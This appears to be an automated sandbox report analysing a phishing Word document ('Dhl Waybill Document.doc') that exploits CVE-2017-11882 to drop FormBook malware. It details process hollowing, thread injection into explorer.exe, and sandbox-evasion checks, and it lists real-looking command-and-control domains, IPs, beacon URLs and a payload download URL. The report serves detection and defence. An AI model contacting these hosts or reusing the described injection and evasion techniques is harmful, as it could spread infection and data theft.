Source: C:\Users\user\AppData\Roaming\hkdf.exe

Process information queried: ProcessInformation

Jump to behavior

Source: C:\Users\user\AppData\Roaming\hkdf.exe	Thread delayed: delay time: 40905			Jump to behavior
Source: C:\Users\user\AppData\Roaming\hkdf.exe	Thread delayed: delay time: 922337203685477			Jump to behavior

Source: hkdf.exe, 00000004.00000002.424345984.000000000291C000.00000004.00000001.sdmp	Binary or memory string: VMware SVGA II.Ensure size is invalid.HYou must set resource manager first.PYou must set data provider helper first.nLoad binary '{0}' from file system with internal error.
Source: explorer.exe, 00000007.00000000.475850908.000000000456F000.00000004.00000001.sdmp	Binary or memory string: SCSI\DISK&VEN_VMWARE&PROD_VIRTUAL_DISK\5&22BE343F&0&000000
Source: hkdf.exe, 00000004.00000002.424345984.000000000291C000.00000004.00000001.sdmp	Binary or memory string: InstallPathJC:\PROGRAM FILES\VMWARE\VMWARE TOOLS\
Source: hkdf.exe, 00000004.00000002.424345984.000000000291C000.00000004.00000001.sdmp	Binary or memory string: vmware
Source: explorer.exe, 00000007.00000000.475850908.000000000456F000.00000004.00000001.sdmp	Binary or memory string: IDE\CDROMNECVMWAR_VMWARE_SATA_CD01_______________1.00____\6&373888B8&0&1.0.0
Source: explorer.exe, 00000007.00000000.466203941.000000000029B000.00000004.00000020.sdmp	Binary or memory string: IDE\CDROMNECVMWAR_VMWARE_SATA_CD01_______________1.00____\6&373888B8&0&1.0.0*N
Source: hkdf.exe, 00000004.00000002.424345984.000000000291C000.00000004.00000001.sdmp	Binary or memory string: VMWAREDSOFTWARE\VMware, Inc.\VMware Tools

Source: C:\Users\user\AppData\Roaming\hkdf.exe

Code function: 6_2_004088E0 rdtsc

6_2_004088E0

Source: C:\Users\user\AppData\Roaming\hkdf.exe	Process token adjusted: Debug	Jump to behavior
Source: C:\Users\user\AppData\Roaming\hkdf.exe	Process token adjusted: Debug	Jump to behavior
Source: C:\Windows\SysWOW64\control.exe	Process token adjusted: Debug	Jump to behavior

Source: C:\Users\user\AppData\Roaming\hkdf.exe	Code function: 6_2_009C26F8 mov eax, dword ptr fs:[00000030h]		6_2_009C26F8
Source: C:\Windows\SysWOW64\control.exe	Code function: 8_2_01E226F8 mov eax, dword ptr fs:[00000030h]		8_2_01E226F8

Source: C:\Users\user\AppData\Roaming\hkdf.exe	Process queried: DebugPort			Jump to behavior
Source: C:\Windows\SysWOW64\control.exe	Process queried: DebugPort			Jump to behavior

Source: C:\Users\user\AppData\Roaming\hkdf.exe

Code function: 6_2_00409B50 LdrLoadDll,

6_2_00409B50

Source: C:\Users\user\AppData\Roaming\hkdf.exe

Memory allocated: page read and write | page guard

Jump to behavior

HIPS / PFW / Operating System Protection Evasion:

System process connects to network (likely due to code injection or exploit)

Show sources

Source: C:\Windows\explorer.exe	Network Connect: 167.99.163.124 80	Jump to behavior
Source: C:\Windows\explorer.exe	Domain query: www.multidetoxhepatico.com
Source: C:\Windows\explorer.exe	Network Connect: 109.71.253.24 80	Jump to behavior
Source: C:\Windows\explorer.exe	Domain query: www.rdaniels2.com
Source: C:\Windows\explorer.exe	Domain query: www.ff4c2myy0.xyz
Source: C:\Windows\explorer.exe	Network Connect: 147.124.221.147 80	Jump to behavior
Source: C:\Windows\explorer.exe	Network Connect: 75.2.60.5 80	Jump to behavior
Source: C:\Windows\explorer.exe	Domain query: www.bagways.com
Source: C:\Windows\explorer.exe	Network Connect: 104.21.53.218 80	Jump to behavior
Source: C:\Windows\explorer.exe	Domain query: www.digitize-vision.com
Source: C:\Windows\explorer.exe	Network Connect: 3.19.116.195 80	Jump to behavior
Source: C:\Windows\explorer.exe	Domain query: www.ktieman.com
Source: C:\Windows\explorer.exe	Network Connect: 23.225.139.107 80	Jump to behavior
Source: C:\Windows\explorer.exe	Domain query: www.daudcoffee.com
Source: C:\Windows\explorer.exe	Domain query: www.sdoook.com
Source: C:\Windows\explorer.exe	Network Connect: 34.102.136.180 80	Jump to behavior
Source: C:\Windows\explorer.exe	Domain query: www.atlasconcretos.com
Source: C:\Windows\explorer.exe	Domain query: www.xn--growbb-fvab.com
Source: C:\Windows\explorer.exe	Domain query: www.ridvanyilmaz.com

Sample uses process hollowing technique

Show sources

Source: C:\Users\user\AppData\Roaming\hkdf.exe

Section unmapped: C:\Windows\SysWOW64\control.exe base address: E0000

Jump to behavior

Maps a DLL or memory area into another process

Show sources

Source: C:\Users\user\AppData\Roaming\hkdf.exe	Section loaded: unknown target: C:\Windows\explorer.exe protection: execute and read and write	Jump to behavior
Source: C:\Users\user\AppData\Roaming\hkdf.exe	Section loaded: unknown target: C:\Windows\SysWOW64\control.exe protection: execute and read and write	Jump to behavior
Source: C:\Users\user\AppData\Roaming\hkdf.exe	Section loaded: unknown target: C:\Windows\SysWOW64\control.exe protection: execute and read and write	Jump to behavior
Source: C:\Windows\SysWOW64\control.exe	Section loaded: unknown target: C:\Windows\explorer.exe protection: read write	Jump to behavior
Source: C:\Windows\SysWOW64\control.exe	Section loaded: unknown target: C:\Windows\explorer.exe protection: execute and read and write	Jump to behavior

Injects a PE file into a foreign processes

Show sources

Source: C:\Users\user\AppData\Roaming\hkdf.exe

Memory written: C:\Users\user\AppData\Roaming\hkdf.exe base: 400000 value starts with: 4D5A

Jump to behavior

Queues an APC in another process (thread injection)

Show sources

Source: C:\Users\user\AppData\Roaming\hkdf.exe

Thread APC queued: target process: C:\Windows\explorer.exe

Jump to behavior

Modifies the context of a thread in another process (thread injection)

Show sources

Source: C:\Users\user\AppData\Roaming\hkdf.exe	Thread register set: target process: 1764			Jump to behavior
Source: C:\Windows\SysWOW64\control.exe	Thread register set: target process: 1764			Jump to behavior

Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	Process created: C:\Users\user\AppData\Roaming\hkdf.exe C:\Users\user\AppData\Roaming\hkdf.exe	Jump to behavior
Source: C:\Users\user\AppData\Roaming\hkdf.exe	Process created: C:\Users\user\AppData\Roaming\hkdf.exe C:\Users\user\AppData\Roaming\hkdf.exe	Jump to behavior
Source: C:\Users\user\AppData\Roaming\hkdf.exe	Process created: C:\Users\user\AppData\Roaming\hkdf.exe C:\Users\user\AppData\Roaming\hkdf.exe	Jump to behavior

Source: C:\Users\user\AppData\Roaming\hkdf.exe	Queries volume information: C:\Users\user\AppData\Roaming\hkdf.exe VolumeInformation			Jump to behavior
Source: C:\Users\user\AppData\Roaming\hkdf.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation			Jump to behavior

Source: C:\Users\user\AppData\Roaming\hkdf.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

Jump to behavior

Stealing of Sensitive Information:

Yara detected FormBook

Show sources

Source: Yara match	File source: 6.0.hkdf.exe.400000.9.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 6.2.hkdf.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 6.2.hkdf.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 6.0.hkdf.exe.400000.9.unpack, type: UNPACKEDPE
Source: Yara match	File source: 4.2.hkdf.exe.39d8b40.4.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 6.0.hkdf.exe.400000.7.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 4.2.hkdf.exe.3ce4180.5.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 6.0.hkdf.exe.400000.5.unpack, type: UNPACKEDPE
Source: Yara match	File source: 6.0.hkdf.exe.400000.7.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000006.00000002.461713601.00000000003C0000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match	File source: 00000008.00000002.674851184.0000000000240000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000006.00000000.421161795.0000000000400000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000008.00000002.674778890.0000000000130000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match	File source: 00000007.00000000.446591124.00000000097EC000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match	File source: 00000008.00000002.674699956.0000000000100000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match	File source: 00000006.00000002.461733467.0000000000400000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000006.00000000.421641009.0000000000400000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000004.00000002.425109708.00000000038F9000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000006.00000002.461663216.0000000000240000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match	File source: 00000007.00000000.453880697.00000000097EC000.00000040.00020000.sdmp, type: MEMORY

Remote Access Functionality:

Yara detected FormBook

Show sources

Source: Yara match	File source: 6.0.hkdf.exe.400000.9.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 6.2.hkdf.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 6.2.hkdf.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 6.0.hkdf.exe.400000.9.unpack, type: UNPACKEDPE
Source: Yara match	File source: 4.2.hkdf.exe.39d8b40.4.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 6.0.hkdf.exe.400000.7.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 4.2.hkdf.exe.3ce4180.5.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 6.0.hkdf.exe.400000.5.unpack, type: UNPACKEDPE
Source: Yara match	File source: 6.0.hkdf.exe.400000.7.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000006.00000002.461713601.00000000003C0000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match	File source: 00000008.00000002.674851184.0000000000240000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000006.00000000.421161795.0000000000400000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000008.00000002.674778890.0000000000130000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match	File source: 00000007.00000000.446591124.00000000097EC000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match	File source: 00000008.00000002.674699956.0000000000100000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match	File source: 00000006.00000002.461733467.0000000000400000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000006.00000000.421641009.0000000000400000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000004.00000002.425109708.00000000038F9000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000006.00000002.461663216.0000000000240000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match	File source: 00000007.00000000.453880697.00000000097EC000.00000040.00020000.sdmp, type: MEMORY

Mitre Att&ck Matrix

Initial Access	Execution	Persistence	Privilege Escalation	Defense Evasion	Credential Access	Discovery	Lateral Movement	Collection	Exfiltration	Command and Control	Network Effects	Remote Service Effects	Impact
Valid Accounts	Shared Modules1	Path Interception	Process Injection611	Masquerading11	OS Credential Dumping	Security Software Discovery221	Remote Services	Archive Collected Data1	Exfiltration Over Other Network Medium	Encrypted Channel1	Eavesdrop on Insecure Network Communication	Remotely Track Device Without Authorization	Modify System Partition
Default Accounts	Exploitation for Client Execution13	Boot or Logon Initialization Scripts	Boot or Logon Initialization Scripts	Disable or Modify Tools1	LSASS Memory	Process Discovery1	Remote Desktop Protocol	Data from Removable Media	Exfiltration Over Bluetooth	Ingress Tool Transfer14	Exploit SS7 to Redirect Phone Calls/SMS	Remotely Wipe Data Without Authorization	Device Lockout
Domain Accounts	At (Linux)	Logon Script (Windows)	Logon Script (Windows)	Virtualization/Sandbox Evasion31	Security Account Manager	Virtualization/Sandbox Evasion31	SMB/Windows Admin Shares	Data from Network Shared Drive	Automated Exfiltration	Non-Application Layer Protocol3	Exploit SS7 to Track Device Location	Obtain Device Cloud Backups	Delete Device Data
Local Accounts	At (Windows)	Logon Script (Mac)	Logon Script (Mac)	Process Injection611	NTDS	Remote System Discovery1	Distributed Component Object Model	Input Capture	Scheduled Transfer	Application Layer Protocol123	SIM Card Swap		Carrier Billing Fraud
Cloud Accounts	Cron	Network Logon Script	Network Logon Script	Deobfuscate/Decode Files or Information1	LSA Secrets	File and Directory Discovery1	SSH	Keylogging	Data Transfer Size Limits	Fallback Channels	Manipulate Device Communication		Manipulate App Store Rankings or Ratings
Replication Through Removable Media	Launchd	Rc.common	Rc.common	Obfuscated Files or Information41	Cached Domain Credentials	System Information Discovery113	VNC	GUI Input Capture	Exfiltration Over C2 Channel	Multiband Communication	Jamming or Denial of Service		Abuse Accessibility Features
External Remote Services	Scheduled Task	Startup Items	Startup Items	Software Packing13	DCSync	Network Sniffing	Windows Remote Management	Web Portal Capture	Exfiltration Over Alternative Protocol	Commonly Used Port	Rogue Wi-Fi Access Points		Data Encrypted for Impact

Behavior Graph

Hide Legend

Legend:

Process
Signature
Created File
DNS/IP Info
Is Dropped
Is Windows Process
Number of created Registry Values
Number of created Files
Visual Basic
Delphi
Java
.Net C# or VB.NET
C, C++ or other language
Is malicious
Internet

Screenshots

Thumbnails

This section contains all screenshots as thumbnails, including those not shown in the slideshow.

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

Source	Detection	Scanner	Label	Link
Dhl Waybill Document.doc	28%	Virustotal		Browse
Dhl Waybill Document.doc	36%	ReversingLabs	Document-Office.Exploit.CVE-2017-11882

Dropped Files

Source	Detection	Scanner	Label	Link
C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.Word\~WRF{1BD043B5-1023-4485-A58F-D199003494BA}.tmp	100%	Avira	EXP/CVE-2017-11882.Gen
C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.Word\~WRF{1BD043B5-1023-4485-A58F-D199003494BA}.tmp	100%	Joe Sandbox ML

Unpacked PE Files

Source	Detection	Scanner	Label	Download
6.2.hkdf.exe.400000.0.unpack	100%	Avira	TR/Crypt.ZPACK.Gen	Download File
6.2.hkdf.exe.8d73c8.2.unpack	100%	Avira	TR/Dropper.Gen	Download File
6.0.hkdf.exe.400000.9.unpack	100%	Avira	TR/Crypt.ZPACK.Gen	Download File
8.0.control.exe.e0000.0.unpack	100%	Avira	TR/Dropper.Gen	Download File
8.2.control.exe.e0000.0.unpack	100%	Avira	TR/Dropper.Gen	Download File
6.0.hkdf.exe.400000.5.unpack	100%	Avira	TR/Crypt.ZPACK.Gen	Download File
6.0.hkdf.exe.400000.7.unpack	100%	Avira	TR/Crypt.ZPACK.Gen	Download File
6.2.hkdf.exe.430000.1.unpack	100%	Avira	TR/Dropper.Gen	Download File

Domains

Source	Detection	Scanner	Link
multidetoxhepatico.com	4%	Virustotal	Browse
www.atlasconcretos.com	1%	Virustotal	Browse
ff4c2myy0.xyz	2%	Virustotal	Browse

URLs

Source	Detection	Scanner	Label
http://www.atlasconcretos.com/b62n/?VrxdA6JP=pEQZAUdavhsqZJkN83QQx5vUzCZ7bVbXRO/iD/+E6RM5nTIKuIu5/L5eTQ9xaMo7/J5LQA==&7ng=k0GpdJo86r2	0%	Avira URL Cloud	safe
http://www.ridvanyilmaz.com/b62n/?7ng=k0GpdJo86r2&VrxdA6JP=CkbDaw0w78FnUUGmsS8khblO1m9LoxhjWgnULl67DqIIYbf1Mw49JamKO+kmV1m+rdKGzg==	0%	Avira URL Cloud	safe
http://www.ff4c2myy0.xyz/b62n/?7ng=k0GpdJo86r2&VrxdA6JP=2z8/DFBk6RpWpVb2yB1064sDrPXSeSOfJo6AXswKq2sMG6ZpedajFkWvnUFPGoiFanmBYQ==	100%	Avira URL Cloud	phishing
http://www.ktieman.com/b62n/?VrxdA6JP=IxnxMsk6Wllyu7aaf2DybOktFmU9HSWwHr0GL2zVz1catFUyroC1Dw2DbvezW0NZbbspDQ==&7ng=k0GpdJo86r2	0%	Avira URL Cloud	safe
http://www.%s.comPA	0%	URL Reputation	safe
http://2.56.57.187/LaXgQ8hib9fwKQI.bat	100%	Avira URL Cloud	malware
http://www.digitize-vision.com/b62n/?VrxdA6JP=RV/S0wPXEG6CXRSSMKnov5Df6lzEYpgbtRkMDrTyCZrZsrYIsxb4Wyn5lCyUpYtxxVTqxA==&7ng=k0GpdJo86r2	0%	Avira URL Cloud	safe
www.multidetoxhepatico.com/b62n/	0%	Avira URL Cloud	safe
http://www.bagways.com/b62n/?7ng=k0GpdJo86r2&VrxdA6JP=Ry9//1u1KSBgvJVTMKtsoBLsTLEtS61U1s5lXOGkeFjYXUCmgqEi+s/kbRLZIKsosKg42g==	0%	Avira URL Cloud	safe
http://www.xn--growbb-fvab.com/b62n/?VrxdA6JP=4vMzR1O6TdRvdnjwNsxZKAWsXyEcarJE8V5Wgs9HzMhC/KpAuLZfktwaHjQNhKT+WAJJHA==&7ng=k0GpdJo86r2	0%	Avira URL Cloud	safe

Domains and IPs

Contacted Domains

Name	IP	Active	Malicious	Antivirus Detection	Reputation
hdr-nlb4-0bbd2e21834cb637.elb.us-east-2.amazonaws.com	3.19.116.195	true	false		high
www.ktieman.com	75.2.60.5	true	true		unknown
multidetoxhepatico.com	147.124.221.147	true	true	4%, Virustotal, Browse	unknown
www.atlasconcretos.com	167.99.163.124	true	true	1%, Virustotal, Browse	unknown
ff4c2myy0.xyz	23.225.139.107	true	true	2%, Virustotal, Browse	unknown
xn--growbb-fvab.com	34.102.136.180	true	false		unknown
www.ridvanyilmaz.com	104.21.53.218	true	true		unknown
www.digitize-vision.com	109.71.253.24	true	true		unknown
www.multidetoxhepatico.com	unknown	unknown	true		unknown
www.rdaniels2.com	unknown	unknown	true		unknown
www.ff4c2myy0.xyz	unknown	unknown	true		unknown
www.daudcoffee.com	unknown	unknown	true		unknown
www.sdoook.com	unknown	unknown	true		unknown
www.bagways.com	unknown	unknown	true		unknown
www.xn--growbb-fvab.com	unknown	unknown	true		unknown

Contacted URLs

Name	Malicious	Antivirus Detection	Reputation
http://www.atlasconcretos.com/b62n/?VrxdA6JP=pEQZAUdavhsqZJkN83QQx5vUzCZ7bVbXRO/iD/+E6RM5nTIKuIu5/L5eTQ9xaMo7/J5LQA==&7ng=k0GpdJo86r2	true	Avira URL Cloud: safe	unknown
http://www.ridvanyilmaz.com/b62n/?7ng=k0GpdJo86r2&VrxdA6JP=CkbDaw0w78FnUUGmsS8khblO1m9LoxhjWgnULl67DqIIYbf1Mw49JamKO+kmV1m+rdKGzg==	true	Avira URL Cloud: safe	unknown
http://www.ff4c2myy0.xyz/b62n/?7ng=k0GpdJo86r2&VrxdA6JP=2z8/DFBk6RpWpVb2yB1064sDrPXSeSOfJo6AXswKq2sMG6ZpedajFkWvnUFPGoiFanmBYQ==	true	Avira URL Cloud: phishing	unknown
http://www.ktieman.com/b62n/?VrxdA6JP=IxnxMsk6Wllyu7aaf2DybOktFmU9HSWwHr0GL2zVz1catFUyroC1Dw2DbvezW0NZbbspDQ==&7ng=k0GpdJo86r2	true	Avira URL Cloud: safe	unknown
http://2.56.57.187/LaXgQ8hib9fwKQI.bat	true	Avira URL Cloud: malware	unknown
http://www.digitize-vision.com/b62n/?VrxdA6JP=RV/S0wPXEG6CXRSSMKnov5Df6lzEYpgbtRkMDrTyCZrZsrYIsxb4Wyn5lCyUpYtxxVTqxA==&7ng=k0GpdJo86r2	true	Avira URL Cloud: safe	unknown
www.multidetoxhepatico.com/b62n/	true	Avira URL Cloud: safe	low
http://www.bagways.com/b62n/?7ng=k0GpdJo86r2&VrxdA6JP=Ry9//1u1KSBgvJVTMKtsoBLsTLEtS61U1s5lXOGkeFjYXUCmgqEi+s/kbRLZIKsosKg42g==	true	Avira URL Cloud: safe	unknown
http://www.xn--growbb-fvab.com/b62n/?VrxdA6JP=4vMzR1O6TdRvdnjwNsxZKAWsXyEcarJE8V5Wgs9HzMhC/KpAuLZfktwaHjQNhKT+WAJJHA==&7ng=k0GpdJo86r2	false	Avira URL Cloud: safe	unknown

URLs from Memory and Binaries

Name	Source	Malicious	Antivirus Detection	Reputation
http://www.windows.com/pctv.	explorer.exe, 00000007.00000000.441178174.0000000002AE0000.00000002.00020000.sdmp	false		high
http://investor.msn.com	explorer.exe, 00000007.00000000.441178174.0000000002AE0000.00000002.00020000.sdmp	false		high
http://www.msnbc.com/news/ticker.txt	explorer.exe, 00000007.00000000.441178174.0000000002AE0000.00000002.00020000.sdmp	false		high
http://schemas.xmlsoap.org/ws/2004/08/addressing/role/anonymous.	explorer.exe, 00000007.00000000.466435720.0000000001BE0000.00000002.00020000.sdmp	false		high
http://investor.msn.com/	explorer.exe, 00000007.00000000.441178174.0000000002AE0000.00000002.00020000.sdmp	false		high
http://www.piriform.com/ccleaner	explorer.exe, 00000007.00000000.451841396.0000000004513000.00000004.00000001.sdmp, explorer.exe, 00000007.00000000.433529805.0000000004513000.00000004.00000001.sdmp	false		high
http://www.%s.comPA	explorer.exe, 00000007.00000000.466435720.0000000001BE0000.00000002.00020000.sdmp	false	URL Reputation: safe	low
http://www.hotmail.com/oe	explorer.exe, 00000007.00000000.441178174.0000000002AE0000.00000002.00020000.sdmp	false		high
https://contextual.media.net/checksync.php?&vsSync=1&cs=1&hb=1&cv=37&ndec=1&cid=8HBSKZM1Y&prvid=77%2	explorer.exe, 00000007.00000000.445889407.0000000008320000.00000004.00000001.sdmp	false		high

Contacted IPs

No. of IPs < 25%
25% < No. of IPs < 50%
50% < No. of IPs < 75%
75% < No. of IPs

Public

IP	Domain	Country	ASN	ASN Name	Malicious
167.99.163.124	www.atlasconcretos.com	United States	14061	DIGITALOCEAN-ASNUS	true
3.19.116.195	hdr-nlb4-0bbd2e21834cb637.elb.us-east-2.amazonaws.com	United States	16509	AMAZON-02US	false
109.71.253.24	www.digitize-vision.com	Germany	207770	ATLANTIACLOUDNL	true
2.56.57.187	unknown	Netherlands	395800	GBTCLOUDUS	false
23.225.139.107	ff4c2myy0.xyz	United States	40065	CNSERVERSUS	true
34.102.136.180	xn--growbb-fvab.com	United States	15169	GOOGLEUS	false
147.124.221.147	multidetoxhepatico.com	United States	1432	AC-AS-1US	true
75.2.60.5	www.ktieman.com	United States	16509	AMAZON-02US	true
104.21.53.218	www.ridvanyilmaz.com	United States	13335	CLOUDFLARENETUS	true

Private

IP
192.168.2.22
192.168.2.255

General Information

Joe Sandbox Version:	34.0.0 Boulder Opal
Analysis ID:	540376
Start date:	15.12.2021
Start time:	14:47:01
Joe Sandbox Product:	CloudBasic
Overall analysis duration:	0h 12m 0s
Hypervisor based Inspection enabled:	false
Report type:	full
Sample file name:	Dhl Waybill Document.doc
Cookbook file name:	defaultwindowsofficecookbook.jbs
Analysis system description:	Windows 7 x64 SP1 with Office 2010 SP1 (IE 11, FF52, Chrome 57, Adobe Reader DC 15, Flash 25.0.0.127, Java 8 Update 121, .NET 4.6.2)
Number of analysed new started processes analysed:	10
Number of new started drivers analysed:	0
Number of existing processes analysed:	0
Number of existing drivers analysed:	0
Number of injected processes analysed:	1
Technologies:	HCA enabled EGA enabled HDC enabled AMSI enabled
Analysis Mode:	default
Analysis stop reason:	Timeout
Detection:	MAL
Classification:	mal100.troj.expl.evad.winDOC@9/9@11/11
EGA Information:	Failed
HDC Information:	Successful, ratio: 17.9% (good quality ratio 16.9%) Quality average: 68.2% Quality standard deviation: 29.2%
HCA Information:	Successful, ratio: 100% Number of executed functions: 106 Number of non-executed functions: 46
Cookbook Comments:	Adjust boot time Enable AMSI Found application associated with file extension: .doc Found Word or Excel or PowerPoint or XPS Viewer Attach to Office via COM Scroll down Close Viewer
Warnings:	Show All Exclude process from analysis (whitelisted): dllhost.exe, WMIADAP.exe, svchost.exe Report size getting too big, too many NtCreateFile calls found. Report size getting too big, too many NtEnumerateValueKey calls found. Report size getting too big, too many NtQueryAttributesFile calls found.

Simulations

Behavior and APIs

Time	Type	Description
14:47:18	API Interceptor	49x Sleep call for process: EQNEDT32.EXE modified
14:47:20	API Interceptor	84x Sleep call for process: hkdf.exe modified
14:47:45	API Interceptor	154x Sleep call for process: control.exe modified
14:48:22	API Interceptor	1x Sleep call for process: explorer.exe modified

Joe Sandbox View / Context

IPs

Match	Associated Sample Name / URL	SHA 256	Detection	Link	Context
2.56.57.187	Documento de carta de porte de Dhl.doc	Get hash	malicious	Browse	2.56.57.187/iqvs4Dh5DjH9PUI.bat
	PO-HEQ211025001T-EXPP v4.doc	Get hash	malicious	Browse	2.56.57.187/GYwfQyzT2egjGEl.bat
	PO-HEQ211025001T-EXPP v4.doc	Get hash	malicious	Browse	2.56.57.187/POHEQ21102.exe
	Cadbon - Inquiry MEI-301121.doc	Get hash	malicious	Browse	2.56.57.187/jImK4QTHuMXLX96.exe
23.225.139.107	nE4LlE5GCQ.exe	Get hash	malicious	Browse	www.ff4cuno43.xyz/fqiq/?l6Al2rk=I63H3q6o+dl8AtpK+GpoKwAA/R2rUg5XwX/Qi823haVwXJBXcEYht0Yyg/fQMhe0Sr5t&z48PE=7n64iJoXxZL8l
	REMITTANCE ADVICE.xlsx	Get hash	malicious	Browse	www.ff4cu6twc.xyz/m07f/?1bNL=ujK0A0Axe&rH=tzIWBhQA5aqHKz2ROtt6a6usAM9Qab1gVWWiOPolT2IGaKIaENxndj7RpsPmNN2djMuRYw==
	YxdP7daEdJ.exe	Get hash	malicious	Browse	www.ff4cuno43.xyz/fqiq/?K61LHN=I63H3q6o+dl8AtpK+GpoKwAA/R2rUg5XwX/Qi823haVwXJBXcEYht0Yyg/fQMhe0Sr5t&5j=-ZjDMNWxmPTtXB
	ZDSWrJbftX.exe	Get hash	malicious	Browse	www.ff4cu6twc.xyz/m07f/?-Zp=DVUdfr9&d4t=tzIWBhQF5dqDKj6dMtt6a6usAM9Qab1gVWOySM0kXWIHa7kcDdgrLnDTqJjwJdyuoPzh
	DkX9HVJTmi.exe	Get hash	malicious	Browse	www.ff4cuno43.xyz/fqiq/?LjQ=I63H3q6o+dl8AtpK+GpoKwAA/R2rUg5XwX/Qi823haVwXJBXcEYht0Yyg8zAQQCPVeQ8MatEUA==&yvK=MDH4HPWpxDL
	REMITTANCE ADVICE.xlsx	Get hash	malicious	Browse	www.ff4cu6twc.xyz/m07f/?ZR=tzIWBhQA5aqHKz2ROtt6a6usAM9Qab1gVWWiOPolT2IGaKIaENxndj7RpsPmNN2djMuRYw==&LHvL=uXndxlsxTh
	triage_dropped_file.exe	Get hash	malicious	Browse	www.ff4cuno43.xyz/fqiq/?5jo4Zxb8=I63H3q6o+dl8AtpK+GpoKwAA/R2rUg5XwX/Qi823haVwXJBXcEYht0Yyg/fQMhe0Sr5t&j0GDQ=-ZVdlnjxh6XhUR
	Citation-HEQ211025001T-EXPP v4,pdf.exe	Get hash	malicious	Browse	www.ff4c2myy0.xyz/b62n/?0N645BeP=2z8/DFBh6WpSpFX6wB1064sDrPXSeSOfJoiQLvsLuWsNGL1vZNLvTgutkyJJNZ2OPBS2&vVSdF=CPGHuRZ
	nieuwe voorbeeldcatalogus.exe	Get hash	malicious	Browse	www.ff4cdhffx.xyz/wtcv/?fDKDRP=4hl0tBDHW6JPsXG0&nfB=FSi4Qdy434FsvWx/pZkyb0EEcskqbIDHoUhsco76HWNDqdZM/2zbMwwINEqH4o0RX6tYdNliSQ==
	ITRli68rgq.exe	Get hash	malicious	Browse	www.ff4ciib4q.xyz/bs8f/?of=9rSLDPtHxj9hfT&3fKPRDU=l/4T0KvG3Qbse26kA+T24bIAmCiYaIE9w6t3mmhaX7GL32gDljPc3Nx0v53cYcljly9R
	NUo71b3C4p.exe	Get hash	malicious	Browse	www.ff4cuno43.xyz/fqiq/?08CT3r=I63H3q6o+dl8AtpK+GpoKwAA/R2rUg5XwX/Qi823haVwXJBXcEYht0Yyg/fQMhe0Sr5t&fB8P=4hMPVF78e
	rundll32.exe	Get hash	malicious	Browse	www.ff4cuno43.xyz/fqiq/?G48P-=I63H3q6o+dl8AtpK+GpoKwAA/R2rUg5XwX/Qi823haVwXJBXcEYht0Yyg8z5PhiMbIM7MatDHw==&hR=2dsLLTLhqbjx
	fdnVx1v1hc.exe	Get hash	malicious	Browse	www.ff4cuno43.xyz/fqiq/?r8k4qP=I63H3q6o+dl8AtpK+GpoKwAA/R2rUg5XwX/Qi823haVwXJBXcEYht0Yyg8zAQQCPVeQ8MatEUA==&eFN=NfkTrPI0M
	Draft shipping docs CI+PL_pdf.exe	Get hash	malicious	Browse	www.ff4ciib4q.xyz/bs8f/?oZR0KfS=l/4T0KvG3Qbse26kA+T24bIAmCiYaIE9w6t3mmhaX7GL32gDljPc3Nx0v6XMX91b7XUW&4heD=t0DpAxUX0Zi
	file0_stage3.dll	Get hash	malicious	Browse	www.ff4c75x4e.xyz/n8rn/?p2M=CBFdZGnnfRINNaHscVQzF6AW/CZxn+KqjlWBM+9MoyK/4TfCk94Vamz7l1wogD2uBQw9&klfLI=1bpx2rFhipSD4d
	sLtLgOtoPA.exe	Get hash	malicious	Browse	www.ff4cuno43.xyz/fqiq/?Pbu=IbAhXpax&i48l=I63H3q6o+dl8AtpK+GpoKwAA/R2rUg5XwX/Qi823haVwXJBXcEYht0Yyg8/ADAOMMOQq
	Cs3PcPy48f.msi	Get hash	malicious	Browse	www.ff4ca2623.xyz/fs3g/?Nr=Ya9NpMQyWUJcX8KgUZas68LXNBlV9zz2Bv5wz28/jqX+xqkVWAhUyruGfYE1L5Gi4K/f&8p_h4N=o2Mtah
